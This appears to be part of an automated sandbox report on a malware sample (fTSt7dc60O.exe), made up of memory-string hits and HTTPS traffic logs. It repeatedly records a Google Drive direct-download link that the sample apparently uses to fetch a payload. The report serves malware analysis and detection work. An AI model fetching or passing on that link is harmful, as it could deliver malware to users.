      Source: fTSt7dc60O.exe, 00000008.00000003.1767051912.00000000071E0000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.2171579304.00000000071E0000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1778836405.00000000071E0000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.2286306653.00000000071E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download/
      Source: fTSt7dc60O.exe, 00000008.00000003.2171579304.00000000071AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download1
      Source: fTSt7dc60O.exe, 00000008.00000003.1767051912.00000000071E0000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.2171579304.00000000071E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download1#
      Source: fTSt7dc60O.exe, 00000008.00000002.2492233155.00000000071E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download=
      Source: fTSt7dc60O.exe, 00000008.00000002.2492233155.00000000071E0000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1767051912.00000000071E0000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.2171579304.00000000071E0000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1778836405.00000000071E0000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.2286306653.00000000071E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=downloadA
      Source: fTSt7dc60O.exe, 00000008.00000002.2492233155.0000000007188000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=downloadJ
      Source: fTSt7dc60O.exe, 00000008.00000002.2492233155.00000000071E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download_
      Source: fTSt7dc60O.exe, 00000008.00000003.1592623794.00000000071D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=downloada
      Source: fTSt7dc60O.exe, 00000008.00000003.1547334302.000000000721F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=downloadam
      Source: fTSt7dc60O.exe, 00000008.00000002.2492233155.00000000071E0000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1767051912.00000000071E0000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.2171579304.00000000071E0000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1778836405.00000000071E0000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.2286306653.00000000071E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=downloade
      Source: fTSt7dc60O.exe, 00000008.00000002.2492233155.00000000071E0000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1767051912.00000000071E0000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1778836405.00000000071E0000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.2286306653.00000000071E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=downloadid
      Source: fTSt7dc60O.exe, 00000008.00000002.2492233155.00000000071E0000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1767051912.00000000071E0000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.2171579304.00000000071E0000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1778836405.00000000071E0000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.2286306653.00000000071E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=downloadk
      Source: fTSt7dc60O.exe, 00000008.00000002.2492233155.0000000007188000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=downloadkq
      Source: fTSt7dc60O.exe, 00000008.00000002.2492233155.0000000007188000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=downloadl
      Source: fTSt7dc60O.exe, 00000008.00000002.2492233155.0000000007188000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000002.2492233155.000000000721F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=downloadom
      Source: fTSt7dc60O.exe, 00000008.00000002.2492233155.00000000071E0000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1767051912.00000000071E0000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1778836405.00000000071E0000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.2286306653.00000000071E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=downloadt
      Source: fTSt7dc60O.exe, 00000008.00000002.2492233155.0000000007188000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=downloadv
      Source: fTSt7dc60O.exe, 00000008.00000003.1778836405.00000000071D7000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1592623794.00000000071D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/wA
      Source: fTSt7dc60O.exe, 00000008.00000003.1835223566.0000000007241000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.2069157679.0000000007240000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.2322710276.0000000007240000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.2429117505.0000000007240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
      Source: fTSt7dc60O.exe, 00000008.00000003.1524814992.000000000721F000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1478904188.000000000721F000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1592710254.000000000721F000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1491048101.000000000721F000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1615874421.000000000721F000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.2171579304.00000000071E0000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.2286306653.000000000721F000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.2171579304.00000000071AC000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1778836405.00000000071E0000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1627045021.000000000721F000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1686747969.000000000721F000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1502459793.000000000721F000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1547334302.000000000721F000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1479093375.000000000721F000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1570023481.0000000007236000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.2286306653.00000000071E0000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1513407431.000000000721F000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1535832337.00000000071F8000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1778836405.000000000721F000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1592623794.00000000071D7000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1513407431.00000000071F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/translate_a/element.js
      Source: fTSt7dc60O.exe, 00000008.00000003.1524814992.000000000721F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/
      Source: fTSt7dc60O.exe, 00000008.00000003.1547276568.0000000007239000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000002.2492233155.00000000071E0000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.2286306653.00000000071AC000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1592623794.00000000071F0000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1710476317.000000000721F000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1569872660.000000000721F000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1580938893.0000000007236000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.2241371856.0000000007239000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1674629095.000000000721F000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.2171579304.000000000721F000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1580893533.000000000721F000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1535832337.000000000721F000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1767051912.00000000071E0000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1524814992.000000000721F000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1478904188.000000000721F000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1592710254.000000000721F000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1491048101.000000000721F000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1615874421.000000000721F000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.2171579304.00000000071E0000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.2286306653.000000000721F000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.2171579304.00000000071AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
      Source: fTSt7dc60O.exe, 00000008.00000002.2492233155.000000000721F000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1513407431.00000000071F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
      Source: fTSt7dc60O.exe, 00000008.00000003.1603353148.0000000007241000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1835223566.0000000007241000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.2069157679.0000000007240000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.2322710276.0000000007240000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.2429117505.0000000007240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
      Source: fTSt7dc60O.exe, 00000008.00000003.1835223566.0000000007241000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.2069157679.0000000007240000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.2322710276.0000000007240000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.2429117505.0000000007240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
      Source: fTSt7dc60O.exe, 00000008.00000003.1615859431.0000000007241000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1603353148.0000000007241000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.comuI(
      Source: fTSt7dc60O.exe, 00000008.00000003.1835223566.0000000007241000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.2069157679.0000000007240000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.2322710276.0000000007240000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.2429117505.0000000007240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
      Source: fTSt7dc60O.exe, 00000008.00000003.1603353148.0000000007241000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1835223566.0000000007241000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.2069157679.0000000007240000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.2322710276.0000000007240000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.2429117505.0000000007240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
      Source: unknownNetwork traffic detected: HTTP traffic on port 52269 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52239
      Source: unknownNetwork traffic detected: HTTP traffic on port 52246 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52119
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52079
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52112
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52233
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52234
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52231
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52232
      Source: unknownNetwork traffic detected: HTTP traffic on port 52252 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 52217 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52237
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52238
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52235
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52236
      Source: unknownNetwork traffic detected: HTTP traffic on port 52232 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 51990 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52240
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52087
      Source: unknownNetwork traffic detected: HTTP traffic on port 52172 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52241
      Source: unknownNetwork traffic detected: HTTP traffic on port 52255 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 52226 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 52203 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 52220 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 52186 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 52270 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 52266 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 52249 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 52192 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 52214 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52244
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52245
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52242
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52243
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52248
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52007
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52128
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52249
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52246
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52247
      Source: unknownNetwork traffic detected: HTTP traffic on port 52235 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 52229 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52251
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52252
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52096
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52250
      Source: unknownNetwork traffic detected: HTTP traffic on port 52263 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 52221 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52019
      Source: unknownNetwork traffic detected: HTTP traffic on port 52248 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52013
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52255
      Source: unknownNetwork traffic detected: HTTP traffic on port 51996 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 52215 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52256
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52253
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52254
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52138
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52259
      Source: unknownNetwork traffic detected: HTTP traffic on port 52231 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52257
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52258
      Source: unknownNetwork traffic detected: HTTP traffic on port 52257 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 52209 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 52234 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 52260 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52262
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52263
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52260
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52261
      Source: unknownNetwork traffic detected: HTTP traffic on port 52180 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 52228 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 52243 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 52138 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 52268 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 52155 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 52251 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52266
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52267
      Source: unknownNetwork traffic detected: HTTP traffic on port 52237 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52264
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52265
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52147
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52268
      Source: unknownNetwork traffic detected: HTTP traffic on port 52212 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52269
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52270
      Source: unknownNetwork traffic detected: HTTP traffic on port 52019 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 52254 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52271
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52030
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52272
      Source: unknownNetwork traffic detected: HTTP traffic on port 52240 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 52070 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 52036 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 52223 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 52030 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 52271 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 52053 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 52265 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 52047 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52036
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52155
      Source: unknownNetwork traffic detected: HTTP traffic on port 52104 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 52236 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 52213 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52164
      Source: unknownNetwork traffic detected: HTTP traffic on port 52259 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 52096 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 52262 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 52079 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 52222 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 52245 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52209
      Source: unknownNetwork traffic detected: HTTP traffic on port 52218 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52047
      Source: unknownNetwork traffic detected: HTTP traffic on port 52239 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 52062 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51990
      Source: unknownNetwork traffic detected: HTTP traffic on port 52253 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 52087 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51996
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52203
      Source: unknownNetwork traffic detected: HTTP traffic on port 52256 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52053
      Source: unknownNetwork traffic detected: HTTP traffic on port 52147 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 52013 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52172
      Source: unknownNetwork traffic detected: HTTP traffic on port 52225 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 52242 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52219
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52217
      Source: unknownNetwork traffic detected: HTTP traffic on port 52112 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52218
      Source: unknownNetwork traffic detected: HTTP traffic on port 52219 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 52244 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 52007 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 52164 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 52267 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 52238 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52212
      Source: unknownNetwork traffic detected: HTTP traffic on port 52250 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52215
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52213
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52214
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52180
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52186
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52062
      Source: unknownNetwork traffic detected: HTTP traffic on port 52119 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 52264 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 52224 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 52241 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52228
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52229
      Source: unknownNetwork traffic detected: HTTP traffic on port 52247 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 52272 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52222
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52223
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52220
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52221
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52226
      Source: unknownNetwork traffic detected: HTTP traffic on port 52230 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52227
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52224
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52104
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52225
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52192
      Source: unknownNetwork traffic detected: HTTP traffic on port 52233 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52070
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52230
      Source: unknownNetwork traffic detected: HTTP traffic on port 52258 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 52128 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 52227 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 52261 -> 443
      Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.7:51990 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.186.161:443 -> 192.168.2.7:51996 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.7:52036 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.7:52053 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.186.161:443 -> 192.168.2.7:52062 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.7:52087 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.7:52104 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.7:52119 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.7:52138 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.7:52172 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.7:52186 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.186.161:443 -> 192.168.2.7:52192 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.7:52203 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.7:52212 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.7:52214 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.7:52217 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.7:52223 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.7:52225 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.7:52227 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.7:52229 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.7:52231 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.7:52235 version: TLS 1.2
